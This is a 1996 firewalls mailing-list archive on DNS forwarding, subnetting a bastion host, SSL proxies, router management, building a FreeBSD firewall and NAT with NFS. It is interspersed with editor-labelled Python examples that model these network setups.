My solution (not endorsed by Paul Vixie, who is going to be working on a much better and more elegant solution) is to add a new directive called 'noforward' which takes a list of domain names which should never be forwarded to the address(es) configured in the 'forwarders' directive.

Consider a typical global organization, say 'nutsnbolts.com', which has a geographically-oriented DNS hierarchy:

    nutsnbolts.com      Core facilities
    na.nutsnbolts.com   North American hosts
    eu.nutsnbolts.com   European hosts
    ap.nutsnbolts.com   Asia/Pacific hosts
    sv.nutsnbolts.com   Services

Zone nutsnbolts.com has proper NS delegation records for na, eu, ap, and sv (all of which are served elsewhere within the organization). Server xyzzy is authoritative for zone nutsnbolts and has a 'forwarders' directive to pass queries to the firewall DNS server.

With standard BIND, a DNS query directed to xyzzy for 'test.eu.nutsnbolts.com' will be sent to the firewall where it probably will be flatly rejected, since the data probably isn't out there in a typical split-DNS configuration. However, with my patches and a 'noforward nutsnbolts.com' directive, the query will be referred or recursed to the server authoritative for 'eu.nutsnbolts.com' and resolved (or not) the way one would expect.

The patches are pretty small (152 lines in total) and pretty easy to inspect. For more complex situations, such as when xyzzy is not authoritative for the top level internal domain or in-addr.arpa domains, use of the experimental 'stub' directive (included in the standard BIND distribution) proves to be a very useful complement to 'noforward'.

Anyone interested in obtaining the patches should email me directly, so as to keep volume on this list to a minimum.
Regards, Todd.Aven@BankersTrust.Com From firewalls-owner Fri Jan 5 17:29:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA10255 for firewalls-outgoing; Fri, 5 Jan 1996 17:27:02 -0800 (PST) Received: from tide10.microsoft.com (tide10.microsoft.com [131.107.3.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA10241 for ; Fri, 5 Jan 1996 17:26:50 -0800 (PST) Received: by tide10.microsoft.com; id RAA24566; Fri, 5 Jan 1996 17:39:02 -0800 Received: from unknown(157.54.17.74) by tide10.microsoft.com via smap (g3.0.3) id xma024518; Fri, 5 Jan 96 17:38:46 -0800 Received: from xnet1 (xnet1.microsoft.com [157.54.17.204]) by imail2.microsoft.com (8.7.1/8.7.1) with SMTP id RAA10982 for ; Fri, 5 Jan 1996 17:28:32 -0800 (PST) X-Received: from xmtp3 by xnet1 with receive; Fri, 5 Jan 1996 17:25:34 -0800 X-Received: from RED-70-MSG by xmtp3 with recvsmtp; Fri, 5 Jan 1996 17:25:27 -0800 Received: by red-70-msg.itg.microsoft.com with Microsoft Exchange (IMC 4.18.611) id <01BADB92.CCC3C480@red-70-msg.itg.microsoft.com>; Fri, 5 Jan 1996 17:25:25 -0800 Message-ID: From: "Kurt Buff (Volt Comp)" To: "firewalls@greatcircle.com" Subject: RE: Bastion netmask query Date: Thu, 4 Jan 1996 22:00:01 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.18.611 X-MsXMTID: xmtp3960106012527RECVSMTP[01.52.00]00000104-23306 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It seems to me that someone with half a brain (not me, I only have 1/4) could write a simple program (PERL, VB, ??) that would take some input (number of nodes, number of segments, network address(es), etc.) and output some reasonable netmasking and segmenting suggestions, including forbidden/unwise host addresses (due to broadcast address conflicts, etc.). Does anyone know of such a beastie? Or would this really be such a hard thing to write? 
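Back to Todd Aven's BIND post above: the behavioural difference between stock BIND 4.9.3 (a configured forwarders list wins over delegation data) and the 'noforward' directive can be modelled as a small dispatch function. This is an added example, not the patch and not BIND code; the zone data, the forwarder name and the one A record are constructed.

```python
"""Model of query dispatch on the internal server 'xyzzy' with and without 'noforward'."""

# Constructed split-DNS picture from the post: xyzzy serves nutsnbolts.com and
# holds NS delegations for the regional subzones (nameserver names are made up).
DELEGATIONS = {
    "na.nutsnbolts.com": "ns.na.nutsnbolts.com",
    "eu.nutsnbolts.com": "ns.eu.nutsnbolts.com",
    "ap.nutsnbolts.com": "ns.ap.nutsnbolts.com",
    "sv.nutsnbolts.com": "ns.sv.nutsnbolts.com",
}
# One constructed record in the zone xyzzy is authoritative for.
AUTHORITATIVE = {"nutsnbolts.com": {"www.nutsnbolts.com": "192.0.2.10"}}
# The 'forwarders' directive: the firewall DNS server (constructed name).
FORWARDERS = ["firewall-dns.nutsnbolts.com"]


def _under(name: str, zone: str) -> bool:
    """True if `name` is `zone` itself or lies below it."""
    return name == zone or name.endswith("." + zone)


def dispatch(qname: str, noforward=()) -> tuple:
    """Decide what xyzzy does with a query.

    Returns one of:
      ("answer", rdata)         answered from authoritative data
      ("forward", forwarder)    sent to the firewall (stock behaviour)
      ("refer", nameserver)     handed to the delegated subzone server
      ("nxdomain", None)        authoritative "no such name"
    `noforward` is the list of domains given to the patched directive.
    """
    qname = qname.rstrip(".").lower()
    for records in AUTHORITATIVE.values():
        if qname in records:
            return ("answer", records[qname])
    # Stock BIND: with forwarders configured, delegation records are ignored,
    # so anything not answered locally goes to the firewall.
    if FORWARDERS and not any(_under(qname, z) for z in noforward):
        return ("forward", FORWARDERS[0])
    # Patched behaviour for names under a 'noforward' domain: follow the
    # longest matching delegation, as the server would without forwarders.
    best = max((z for z in DELEGATIONS if _under(qname, z)), key=len, default=None)
    if best:
        return ("refer", DELEGATIONS[best])
    return ("nxdomain", None)


if __name__ == "__main__":
    q = "test.eu.nutsnbolts.com"
    print("stock BIND:", dispatch(q))
    print("with 'noforward nutsnbolts.com':", dispatch(q, noforward=["nutsnbolts.com"]))
```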
Kurt

----------
From: bobk@manzanita.DEV.3Com.COM[SMTP:bobk@manzanita.DEV.3Com.COM]
Sent: Thursday, January 04, 1996 7:34
To: firewalls@greatcircle.com; jonw@mntcmp2.demon.co.uk
Subject: Re: Bastion netmask query

You wrote:
>
> We have a class C of our own A.B.C.0 and are currently configuring the
> network as follows:
>
>                 Addresses A.B.C.1 to 15
>
>  ISP      +-----------+                      +-----------+
>  Lease    | Cisco     |----------------------| ftp/web   |  plus others
>  ----     | 2514      |          |           | machine   |  as needed
>  Line     |           |----------|           |           |
>           +-----------+          |           +-----------+
>                                  |  subnet is A.B.C.16 to 31
>                                  |
>                                  |  eth0 A.B.C.31
>                            +-----------+
>                            | Bastion   |  Dual Homed
>                            | Machine   |
>                            |           |
>                            +-----------+
>                                  |  eth1 A.B.C.32
>                                  |
>                                  |  subnet is A.B.C.32 to 254
>           -------------------|------------------------  Secure Internal
>
> Can anyone confirm what the netmasks and broadcast addresses should be for the
> two bastion ethernet devices.

First of all, these nets are using three different subnet classification schemes. This can cause problems unless carefully managed.

The subnet mask 255.255.255.240 will divide your class C address space into 16 subnets of 15 hosts each:
A.B.C.0, A.B.C.16, A.B.C.32, A.B.C.48, A.B.C.64, A.B.C.80, A.B.C.96, A.B.C.112, A.B.C.128, A.B.C.144, A.B.C.160, A.B.C.176, A.B.C.192, A.B.C.208, A.B.C.224, A.B.C.240.

The subnet mask 255.255.255.224 will effectively divide your class C address space into 8 subnets of 31 hosts each:
A.B.C.0, A.B.C.32, A.B.C.64, A.B.C.96, A.B.C.128, A.B.C.160, A.B.C.192, A.B.C.224.

The subnet mask 255.255.255.192 will divide your class C into 4 subnets of 63 hosts each:
A.B.C.0, A.B.C.64, A.B.C.128, A.B.C.192.

It is possible to use different masks on each side of the router and bastion machine, but unless you are careful (or using OSPF) (I don't know how IGRP works), you are asking for trouble by splitting up subnets unevenly.
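[Editor's added example, not BobK's or Kurt's code and not the tool Kurt asks about: a subnet-plan checker of the kind that question implies, built on Python's standard ipaddress module. 192.0.2.0/24 is a constructed stand-in for the poster's A.B.C.0; it flags interface addresses that are really a subnet's network or broadcast address, and subnets that overlap when different masks are mixed on the two sides of a box.]

```python
"""Subnet-plan checker (constructed example, not anyone's code from this list).

Given a block and a mask it tabulates the subnets, and given a list of
interfaces it reports the two mistakes the thread is about: an address that is
a network or broadcast address under its own mask, and subnets that overlap
because the masks on each side of a router or bastion do not agree.
"""
import ipaddress
from itertools import combinations

DOC_BLOCK = "192.0.2.0/24"   # constructed stand-in for the poster's A.B.C.0


def subnet_table(block: str, mask) -> list:
    """Carve `block` with `mask` (dotted or prefix length) and describe each subnet."""
    net = ipaddress.ip_network(block, strict=True)
    prefix = ipaddress.ip_network(f"0.0.0.0/{mask}").prefixlen
    rows = []
    for sub in net.subnets(new_prefix=prefix):
        hosts = list(sub.hosts())            # fine for a /24 or smaller block
        rows.append({
            "network": str(sub.network_address),
            "first_host": str(hosts[0]),
            "last_host": str(hosts[-1]),
            "broadcast": str(sub.broadcast_address),
            "usable": len(hosts),
        })
    return rows


def classify(addr: str, mask) -> str:
    """'network', 'broadcast' or 'host' for an interface address under a mask."""
    iface = ipaddress.ip_interface(f"{addr}/{mask}")
    net = iface.network
    if net.prefixlen >= 31:                  # /31 and /32 have no broadcast address
        return "host"
    if iface.ip == net.network_address:
        return "network"
    if iface.ip == net.broadcast_address:
        return "broadcast"
    return "host"


def check_plan(interfaces) -> list:
    """interfaces: iterable of (name, address, mask). Returns human-readable problems."""
    problems, nets = [], []
    for name, addr, mask in interfaces:
        iface = ipaddress.ip_interface(f"{addr}/{mask}")
        kind = classify(addr, mask)
        if kind != "host":
            problems.append(f"{name}: {addr} is the {kind} address of {iface.network}")
        nets.append((name, iface.network))
    for (a, na), (b, nb) in combinations(nets, 2):
        if na != nb and na.overlaps(nb):     # same segment seen twice is fine
            problems.append(f"{a} ({na}) and {b} ({nb}) overlap")
    return problems


# The bastion from the diagram, with the masks BobK lists (constructed plan).
BASTION_240_224 = [("eth0", "192.0.2.31", "255.255.255.240"),
                   ("eth1", "192.0.2.32", "255.255.255.224")]
BASTION_240_192 = [("eth0", "192.0.2.31", "255.255.255.240"),
                   ("eth1", "192.0.2.32", "255.255.255.192")]

if __name__ == "__main__":
    for row in subnet_table(DOC_BLOCK, "255.255.255.240"):
        print(row)
    for plan in (BASTION_240_224, BASTION_240_192):
        print(check_plan(plan) or "no problems")
```

Under 255.255.255.240 the poster's eth0 address .31 is the broadcast of the .16 subnet, and under 255.255.255.224 the eth1 address .32 is the network address of the .32 subnet, so both interfaces need different host addresses whatever mask is finally chosen.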
In addition, you will find that any subnet that is part of a smaller division scheme, but not actually used must be thrown away if this is done with RIP (RIP V.2 can help some).

On the other hand, you may be able to divide up the Class C, and then assign multiple subnets to your larger net, as long as you remember to use the smaller subnet masking scheme, and let the router handle communications between subnets.

I could write a lot more on the subject, but not being sure of your objectives, I'd rather not second guess you here.

Good luck,
BobK

From firewalls-owner Fri Jan 5 20:29:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA13307 for firewalls-outgoing; Fri, 5 Jan 1996 20:21:46 -0800 (PST) Received: from starbase.ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA13302 for ; Fri, 5 Jan 1996 20:21:42 -0800 (PST) Received: from cbk.tiac.net by starbase.ingress.com (SMI-8.6/SMI-SVR4 ) id XAA03816; Fri, 5 Jan 1996 23:21:13 -0500 Date: Fri, 5 Jan 1996 23:21:13 -0500 Message-Id: <199601060421.XAA03816@starbase.ingress.com> X-Sender: cbk@ingress.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: cbk@ingress.com (Charles B. Kaplan) Subject: SSL and S-HTTP Proxy support Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

From what I remember S-HTTP can be fully negotiated within the 'standard' HTTP ports/protocol. Therefore any proxy supporting HTTP should work with S-HTTP.

Next, while SSL COULD be implemented across multiple protocols, etc., the 'only' widespread use presently is via Netscape, and that makes use of port 443 'normally'. The BorderWare Firewall Server, from BNTI, out of the box proxies ports 80, 8001, 8080, and 443, all when its WWW proxy is enabled. I don't see why however you couldn't say use plug-gw on port 443 to do the same types of things.
NOTE however, putting your web server inside your firewall, and then proxying to it is a BIG risk. That of course is why BorderWare provides a 3rd network interface for 'secured servers'.

Well, enough plugging of BorderWare....if you didn't guess I resell it.

Anyone care to either verify or correct the above S-HTTP notes ?

-Charles Kaplan
for more information on BorderWare call 800-254-7159

From firewalls-owner Fri Jan 5 20:44:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA13331 for firewalls-outgoing; Fri, 5 Jan 1996 20:24:24 -0800 (PST) Received: from odin.community.net (odin.community.net [140.174.119.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA13326 for ; Fri, 5 Jan 1996 20:24:21 -0800 (PST) Received: from [140.174.226.108] (n108.coco.community.net [140.174.226.108]) by odin.community.net with SMTP id UAA17610; Fri, 5 Jan 1996 20:22:58 -0800 Date: Fri, 5 Jan 1996 20:22:58 -0800 Message-Id: <199601060422.UAA17610@odin.community.net> Subject: Re: Security managing Cisco Routers From: Bill Husler To: "Paul Ferguson" cc: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>>>At 02:15 PM 12/27/95 GMT, Pietro wrote:
>>>
>>>>My actual problem is to manage several Cisco Routers situated
>>>>on a public network from a central site, from where there is no
>>>>way to guarantee secure communication.
>>>>
>
>>I have heard that Firewall-1 will manage the configurations of CISCO
>>routers remotely. I believe the way it works is that you set up the
>>configuration on a Firewall-1 Administrative Workstation and it sends
>>some sort of encrypted/secured transmission to the router to download the
>>new config.
>>Bill
>>
>
>Although I'm not intimately familiar with the internal mechanisms of
>Firewall-1, I do have a problem with the above paragraph, since we
>do not (yet) support encrypted transport mechanisms.
:-)
>
>- paul
>
>--
>Paul Ferguson                  ||        ||
>Consulting Engineering         ||        ||
>Reston, Virginia USA          ||||      ||||
>tel: +1.703.716.9538      ..:||||||:..:||||||:..
>e-mail: pferguso@cisco.com   c i s c o  S y s t e m s
>
>

Paul,

You're absolutely right! I talked to our Firewall-1 dudes (actually SUN) and they said that communication is in the clear. I don't know what I heard that made me believe otherwise. Sorry if I muddied the waters.

I also asked them to describe why we should have "warm fuzzies" that the changes being made to the router configuration are indeed being sent from the FW-1 admin and not some admin wannabe. I will post their response.

Bill

From firewalls-owner Fri Jan 5 20:59:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA13612 for firewalls-outgoing; Fri, 5 Jan 1996 20:47:40 -0800 (PST) Received: from odin.community.net (odin.community.net [140.174.119.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA13607 for ; Fri, 5 Jan 1996 20:47:36 -0800 (PST) Received: from [140.174.226.108] (n108.coco.community.net [140.174.226.108]) by odin.community.net with SMTP id UAA19237 for ; Fri, 5 Jan 1996 20:46:16 -0800 Date: Fri, 5 Jan 1996 20:46:16 -0800 Message-Id: <199601060446.UAA19237@odin.community.net> Subject: Re: SSL and S-HTTP Proxy support From: Bill Husler To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From: Brian W. McKenney, mckenney@smiley.mitre.org
>
>I would like to have an update as to which commercial firewall vendors
>support or plan to support (when) an SSL and/or S-HTTP proxy. I will post
>a summary.
>
>This is the information that I have:
>
>1. TIS Gauntlet: SSL and S-HTTP proxies in next release.
>2. KarlBridge/KarlBrouter: S-HTTP proxy
>3. Milkyway Blackhole: S-HTTP
>4. SOS Brimstone: S-HTTP proxy
>5. Technologic Interceptor: S-HTTP proxy
>6. V-One SmartWall: S-HTTP proxy
>
>License versions of TIS Gauntlet will support whatever the next Gauntlet
>release supports.
>

You can add ANS Interlock to your list.

Bill

From firewalls-owner Fri Jan 5 23:14:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA15912 for firewalls-outgoing; Fri, 5 Jan 1996 23:01:20 -0800 (PST) Received: from NS1.stl.net (stl.net [199.217.196.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA15907 for ; Fri, 5 Jan 1996 23:01:16 -0800 (PST) Received: from sam.stl.net (sam.stl.net [199.217.196.3]) by NS1.stl.net (8.6.11/8.6.9) with SMTP id BAA16391 for ; Sat, 6 Jan 1996 01:49:18 -0600 Date: Sat, 6 Jan 1996 01:49:18 -0600 Message-Id: <199601060749.BAA16391@NS1.stl.net> X-Sender: bart@pu.com (Unverified) X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: bart@pu.com (Bart Rivard) Subject: Steps in building a firewall, Right or Wrong? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

I think one of the things about building a firewall that has surprised me is how really simple it really is. It makes me wonder if I have done something wrong. Many people say use the TIS toolkit but I really don't see any reason. Here are the steps I have taken; tell me what you think.

1) Installed FreeBSD on a Pentium 100 with 32 MB of RAM and two Ethernet NICs
2) Configured the kernel such that IP forwarding and source routing are disabled.
3) Deleted all accounts on the system except root
4) Gave root a password with numbers, letters, uppercase and lowercase, 10 long
5) Deleted everything out of inetd.conf except DNS
6) Configured DNS so that the only machines it knows about are a Web server which is in the DMZ and the firewall machine, plus a wildcard MX record.
7) Configured resolv.conf on firewall to point to the internal network DNS.
8) Turned off source routing on the CISCO 2500 router and added filters which disable all UDP traffic except port DNS/53, and all TCP inbound traffic except SMTP to the firewall, News from a specific news server to the firewall, and http to the web server in the DMZ. Allow all outbound TCP traffic. Thinking about disabling all ICMP traffic on the router, what do you think?
9) Configured CERN web server as a proxy on the firewall using a weird port number. Wrapped the port with TCP Wrappers and only allow access from internal IP addresses. Internal IP addresses are 192.168.0.0 thru 192.168.255.255. Wish I could limit access to the web proxy by network interface but don't know how?
10) Modified a mail program so that it reads mail from port 25 and writes mail messages to disk. Completely dumb program. Does not handle distribution lists, aliases or anything. I then pick mail up off of disk and send it to the internal CC mail gateway. Was there shareware to do the equivalent? Can sendmail pick mail up off of disk? Is it safe to have sendmail pick mail up off of disk and distribute?
11) Put TCP Wrapper around the news server port to only accept connections from our news provider at AT&T and the internal network. Also use inn access control to limit access from the internal network for reading news and the news provider for dumping news.

Well, that's about it. We provide outbound Web, Gopher, FTP and WAIS through the CERN Proxy. Is this safe? We don't allow any UDP to pass the firewall. We don't allow anything to come in from the outside through the firewall except mail. The firewall doubles as a news server so we don't allow news to pass through the firewall, but the firewall doubles as a news server. Is it safe to use a firewall as a news server?

Please comment!! Send all comments to bart@pu.com.
TIA, Bart From firewalls-owner Sat Jan 6 05:14:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20595 for firewalls-outgoing; Sat, 6 Jan 1996 05:10:13 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20590 for ; Sat, 6 Jan 1996 05:10:10 -0800 (PST) Received: from pferguso-pc.cisco.com (c1robo6.cisco.com [171.68.13.16]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id FAA17555; Sat, 6 Jan 1996 05:08:46 -0800 Message-Id: <199601061308.FAA17555@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 06 Jan 1996 08:09:15 -0500 To: "Kurt Buff (Volt Comp)" From: Paul Ferguson Subject: RE: Bastion netmask query Cc: "firewalls@greatcircle.com" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sure, you could hack something together to do this, but why not simply use RFC-1878 instead? - paul At 10:00 PM 1/4/96 -0800, Kurt Buff (Volt Comp) wrote: >It seems to me that someone with half a brain (not me, I only have 1/4) >could write a simple program (PERL, VB, ??) that would take some input >(number of nodes, number of segments, network address(es), etc.) and output >some reasonable netmasking and segmenting suggestions, including >forbidden/unwise host addresses (due to broadcast address conflicts, etc.). >Does anyone know of such a beastie? Or would this really be such a hard >thing to write? > >Kurt > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. 
e-mail: pferguso@cisco.com   c i s c o  S y s t e m s

From firewalls-owner Sat Jan 6 15:05:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA27839 for firewalls-outgoing; Sat, 6 Jan 1996 14:36:54 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA19713 for ; Sat, 6 Jan 1996 03:49:33 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA26435; Sat, 6 Jan 96 06:48:38 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA06276; Sat, 6 Jan 96 11:49:06 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9601061149.AA06276@london.csd.harris.com> Subject: Re: NAT & NFS ? To: avalon@coombs.anu.edu.au (Darren Reed) Date: Sat, 6 Jan 96 11:49:05 GMT Cc: firewalls@greatcircle.com In-Reply-To: <9601060009.AA05624@hawk.hcsc.com>; from "Darren Reed" at Jan 6, 96 11:10 am X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Darren,

Some NAT definitions I am using to answer your NFS question.

NAT: The change of an IP address within a packet to hide or withhold IP addresses that are not 'public'. This is implied when proxies are in use, but also is done in the IP layer.

external: One of potentially many interfaces which NATs packets as they pass over the interface.

internal: One of potentially many interfaces which does not NAT packets.

session: Transmission and receipt of packets, which includes TCP/UDP transmits and ICMP error receipts.

Any packet 'session' can be initiated from internal to external as the internal host has full visibility of the external address space. The external host will only see packets coming from the firewall. Returned packets will get forwarded (with IP address translated) back to the originator.

Any packet 'session' initiated from external will never get to internal as there is absolutely no visibility of the internal address space.
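[Editor's added example, not Jon's and not Harris CyberGuard code: a model of the session semantics defined above (internal-initiated sessions are translated and replies mapped back; anything initiated from outside is dropped), extended to the NFS mount problem Jon explains in the next paragraph, where the client's machine name rides inside the RPC payload that IP-layer NAT does not rewrite. The addresses, the "MOUNT machname=... path=..." payload format and port 635 for mountd are constructed assumptions.]

```python
"""IP-layer NAT session model plus the NFS mount check it trips over.

Constructed example: not a real NAT implementation. The RPC MOUNT request is
reduced to a text payload carrying the client's machine name, which is what
the AUTH_UNIX credential carries in the real protocol.
"""
from dataclasses import dataclass, field
from typing import Optional

FIREWALL_EXTERNAL = "203.0.113.1"    # constructed: the firewall's external address
INTERNAL_CLIENT = "10.1.1.5"         # constructed: an internal NFS client
EXTERNAL_NFS = "198.51.100.7"        # constructed: an external NFS server


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes = b""


@dataclass
class IpLayerNat:
    external_ip: str
    next_port: int = 40000
    # (proto, nat_port, remote_ip, remote_port) -> (internal_ip, internal_port)
    sessions: dict = field(default_factory=dict)

    def outbound(self, pkt: Packet) -> Packet:
        """internal -> external: rewrite the source and remember the session.
        ICMP errors for a session are handled by real products but not modelled."""
        for key, inside in self.sessions.items():
            if inside == (pkt.src, pkt.sport) and key[0] == pkt.proto \
                    and key[2:] == (pkt.dst, pkt.dport):
                nat_port = key[1]            # existing session: reuse its port
                break
        else:
            nat_port, self.next_port = self.next_port, self.next_port + 1
            self.sessions[(pkt.proto, nat_port, pkt.dst, pkt.dport)] = (pkt.src, pkt.sport)
        # Only the IP/transport header changes; the payload is passed untouched.
        return Packet(pkt.proto, self.external_ip, nat_port, pkt.dst, pkt.dport, pkt.payload)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """external -> internal: deliver only within a session the inside opened.
        Anything else returns None (dropped): the inside is simply not visible."""
        if pkt.dst != self.external_ip:
            return None
        inside = self.sessions.get((pkt.proto, pkt.dport, pkt.src, pkt.sport))
        if inside is None:
            return None
        return Packet(pkt.proto, pkt.src, pkt.sport, inside[0], inside[1], pkt.payload)


def mount_request(client_hostname: str, export: str) -> bytes:
    """Constructed stand-in for an RPC MOUNT call carrying the client's own name."""
    return f"MOUNT machname={client_hostname} path={export}".encode()


def nfs_server_accepts(pkt: Packet, host_table: dict, exports: dict) -> bool:
    """What the external NFS server checks: the packet's source must be allowed
    for the export, and the embedded machine name must resolve to that source."""
    fields = dict(tok.split("=", 1) for tok in pkt.payload.decode().split()[1:])
    if pkt.src not in exports.get(fields["path"], set()):
        return False                         # exports must list the firewall address
    return host_table.get(fields["machname"]) == pkt.src


def demo() -> dict:
    """Walk through the mount from INTERNAL_CLIENT and return each outcome."""
    nat = IpLayerNat(FIREWALL_EXTERNAL)
    req = Packet("udp", INTERNAL_CLIENT, 1023, EXTERNAL_NFS, 635,
                 mount_request("clientbox", "/export"))
    seen = nat.outbound(req)                 # what the external server receives
    results = {
        "server_sees_firewall": seen.src == FIREWALL_EXTERNAL,
        "payload_unchanged": seen.payload == req.payload,
        # exports still naming the internal host: refused outright
        "exports_internal": nfs_server_accepts(
            seen, {"clientbox": INTERNAL_CLIENT}, {"/export": {INTERNAL_CLIENT}}),
        # exports fixed, but the embedded name still resolves inward: refused
        "exports_fixed_name_internal": nfs_server_accepts(
            seen, {"clientbox": INTERNAL_CLIENT}, {"/export": {FIREWALL_EXTERNAL}}),
        # the 'fake' entry: the external host maps the client name to the firewall
        "exports_and_name_fixed": nfs_server_accepts(
            seen, {"clientbox": FIREWALL_EXTERNAL}, {"/export": {FIREWALL_EXTERNAL}}),
    }
    reply = nat.inbound(Packet("udp", EXTERNAL_NFS, 635, FIREWALL_EXTERNAL, seen.sport, b"OK"))
    results["reply_reaches_client"] = reply is not None and \
        (reply.dst, reply.dport) == (INTERNAL_CLIENT, 1023)
    unsolicited = nat.inbound(Packet("tcp", EXTERNAL_NFS, 4444, FIREWALL_EXTERNAL, 2049))
    results["unsolicited_dropped"] = unsolicited is None
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:28} {value}")
```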
The above is true for all TCP, UDP, RPC, and ICMP packets. (For those that do not know, RPC is a protocol using TCP or UDP packets as a carrier. NFS then uses RPC for its communication protocol.)

Now to NFS .....

If an external host has an NFS exported file system, any internal host can mount that file system (as permitted by the normal NFS export rules). If NAT takes place at the IP layer, no extra work or enabling is required at the firewall. The things to be aware of:

1. The external host will see the NFS read/write etc activity coming from the firewall IP address, not the internal host IP address. The exports file needs to reflect this.

2. The external host will see the mount request coming from the firewall IP address, and embedded within the mount request RPC packet is the name of the host doing the mount request. The external host will look up this embedded host name, and if the IP address is not the same as the firewall address, the mount request is refused. You will need to 'fake' the internal host's IP address on the external host if the firewall cannot translate the embedded host name.

Regards
Jon

BTW Are there many firewalls out there that can filter on RPC, as NFS through a firewall is scary. Harris CyberGuard can.

> In some mail from Jon Shallow, sie said:
> >
> > This works fine on the Harris CyberGuard. TCP, UDP, RPC, ICMP all get
> > suitably rewritten - even the ICMP error codes.
> >
> > The 'inside' system can initiate talk to the 'external' system, but the
> > 'external' system has no knowledge of the 'internal' IP address - just
> > the firewall.
>
> This doesn't quite answer what I was wondering...
>
> I'm particularly interested in what this means for NFS...does it mean
> your internal systems need to be setup to allow the firewall to NFS to
> them so that external systems can be provided with NFS ?
> > > > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > > > and server, actively rewriting the addresses in all the packets involved ? > > > If so, have any problems or unexpected situations arisen ? > > darren > From firewalls-owner Sat Jan 6 17:44:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA00945 for firewalls-outgoing; Sat, 6 Jan 1996 17:42:21 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA00938 for ; Sat, 6 Jan 1996 17:42:17 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id TAA02804; Sat, 6 Jan 1996 19:50:40 -0600 Date: Sat, 6 Jan 1996 19:50:40 -0600 (CST) From: "Joe Smith (Really!)" To: Bart Rivard cc: firewalls@GreatCircle.COM Subject: Re: Steps in building a firewall, Right or Wrong? In-Reply-To: <199601060749.BAA16391@NS1.stl.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 6 Jan 1996, Bart Rivard wrote: > 3) Deleted all accounts on the system except root Unless you are limiting access to the system from the console, I would create one account (secured as you did root) to login to the system, and then su to root to do admin work. 
From firewalls-owner Sat Jan 6 18:59:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA01740 for firewalls-outgoing; Sat, 6 Jan 1996 18:47:46 -0800 (PST) Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA01735 for ; Sat, 6 Jan 1996 18:47:42 -0800 (PST) Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA03601 for Firewalls@GreatCircle.COM; Sat, 6 Jan 96 21:46:49 -0500 Apparently-To: Message-Id: Date: 6 Jan 1996 21:57:29 U From: "Server #7000007" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V5 #7 Sent: Fri, Jan 5, 1996 9:36 PM To: Harris Tom On Server: PRC Bellevue NE MS Date: Sat, Jan 6, 1996 9:57 PM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Sun Jan 7 01:44:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id 